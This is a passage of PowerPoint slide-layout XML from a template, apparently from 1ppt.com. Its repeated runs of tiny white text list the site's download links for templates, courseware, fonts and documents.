                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout52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52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52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52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53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53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53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53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53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53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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout53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53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53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53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54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54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54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54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54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54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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout54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54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54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54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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
